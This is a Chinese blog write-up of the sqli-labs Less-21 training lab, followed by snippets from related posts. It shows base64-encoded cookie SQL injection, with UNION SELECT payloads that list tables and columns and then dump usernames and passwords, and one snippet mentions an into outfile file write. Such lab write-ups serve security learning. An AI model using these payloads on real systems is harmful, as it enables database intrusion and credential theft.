sqli-labs/Less-21

于 2022-11-19 20:57:03 发布
阅读量274 收藏
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127941623
版权

这一关成功登录之后的欢迎界面还是显示了cookie值 说明和上一关如出一辙 只不过他的cookie有点不一样 因为这一关他用了base64编码 所以我们每次注入之前都需要进行base64编码

首先进行抓包操作 成功抓取之后然后进行cookie值的修改注入操作

先试试看admin'

输入和回显如下

接着看到了sql语句中此处的结构 属于单引号注入并且带了一个括号

我们输入正确的东西用于作证我们的看法

输入和回显如下

 

我们选择使用联合注入的方式 好久没用了 今天来用一用吧

接着开始进行回显点的判断

输入和回显如下

输入如下

id=1') union select 2,3,4#

 

 

接着进行爆库/版本操作

接着爆表

输入如下

id=1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();#

输出如下

接着进行爆字段的操作

输入如下

id=1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database();#

 输出如下

爆用户名和密码相关信息

输入如下

id=1') union select 1,2,group_concat(username,password) from users;#

 回显如下

成功解题 嗨嗨!! 

axihaihai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli labs less 21
Xiaoxiaoqiang_的博客
03-04 218
sql注入
sqli-labs (less-21)
kukudeshuo的博客
03-11 316
sqli-labs (less-21) 进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入 利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密 转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了 #以下过程均是base64转码后的结果 先输入一个 Jw== #'单引号 屏幕回显错误,根据错误信息
SQLi LABS Less-21
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlibals21SQLI-LABS第二十一关,sqlilabs二十一关
sqli-labs通关(less21~less30)
箭雨镜屋
09-03 3146
Less21 这关刚开始还是和Less20一样,进去是个登录的页面 输入正确的用户名和密码之后,返回的页面有User-Agent,客户端ip地址,cookie,用户名,密码,用户id等信息 登录过程中burpsuite也是抓到两个报文,第一个是发送用户名和密码的POST报文,第二个是GET报文且携带cookie 仔细看这关的GET报文,就和上一关不一样了,Cookie中uname参数的值是base64编码的。 把uname的值粘贴到burpsuite的decoder模块,先decod.
sqli-labs-less-12 PODT传参+有回显信息(图文详解)
yzcn
11-02 454
Less-12 post传递参数 由于是post传参,我们先用burp-suite抓包,分析报文体,获取传参过程。 得到报文体之后使用hackbar插件中的post data进行注入实验 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 登录失败 uname=") or 1=1 #&passwd=&submit=Submit 登录成功,在这里可以得知存在注入点,闭合方式为(“”) 使用order by判断字段列数: uname
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs靶场练习笔记
11-09
>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的时间盲注** - **特点**:通过观察请求响应时间的变化来判断SQL语句的真假。 - **实现方法**:利用`sleep`...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
sqli-labs less21
qq_45106794的博客
10-26 303
#sqli-labs less 19 这一关大概与less18差不多,只不过playload得用base64加密 ') order by 4 ') union select 1,2,3 # ')union select 1,database(),version()# ')union select 1,(select group_concat(table_name) from information...
sqli-labs:less-21
羽的博客
09-10 179
和20题很像。 然后一看cookie是一个base64编码的,解码一下,是Dumb。 所以cookie一个是注入点,只是有个base64编码 随便提一下: base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 这样也就是要将原来的注入语句进行base64编码以后在放到cookie中进行注入。 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T...
sqli-labs————less 21
Fly_鹏程万里
05-12 1569
Less-21做一个简单测试:username:adminpassword:aaa这里的界面和上一关的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该关的代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...
Sqlilabs Less-21
Light_inthe_eyes的博客
03-10 241
登录成功后,burpsuite抓包,发现cookie是加了密: 去网上找解密工具: 接下来的cookie注入也应base64加密 爆表:
Sqli-labs之Less-20和Less-21和Less-22
m0_46315342的博客
06-04 425
                                          &nbs...
Sqlilabs Less-21-22 Cookie Injection- Error Based- complex - string
baynk的博客
03-16 291
Less-21 Cookie Injection- Error Based- complex - string 手工注入 和Less 20很像,进去会显示cookie,用Burpsuite试试看。 其实就是做了一个单引号加括号的闭合,然后用base64加密了。把语句写好以后,转成base64即可。 admin') and 1=2 union select 1,2,database() limit...
sqli-labs靶场练习Less-21~30(持续更新)--ch4nge
ch4nge
10-28 879
Less21-30 作者:ch4nge 目录Less21-30Less21·cookie·E·base64encode手注sqlmapLess 22·cookie·E·base64encode手注sqlmapLess 23·Less 24·二次注入 Less21·cookie·E·base64encode Base64encode之后注入 注入操作同20 登录框没有注入点 setcookie('uname', base64_encode($row1['username']), time()+3600);
Sqli-Lab | Less 21-23
酉酉的博客
02-08 577
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
sqli-labs闯关记录(Less21-Less25)
BROTHERYY的博客
09-04 207
Advanced InjectionsLess-21 Cookie Injection- Error Based- complex - stringLess-22 Cookie Injection- Error Based- Double Quotes - stringLess-23 Error Based- no commentsLess-24 Second Degree InjectionsLess-25 Trick with OR & ANDLess-25a Trick with OR &am
sqli-labs/Less-28
最新发布
01-09
1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值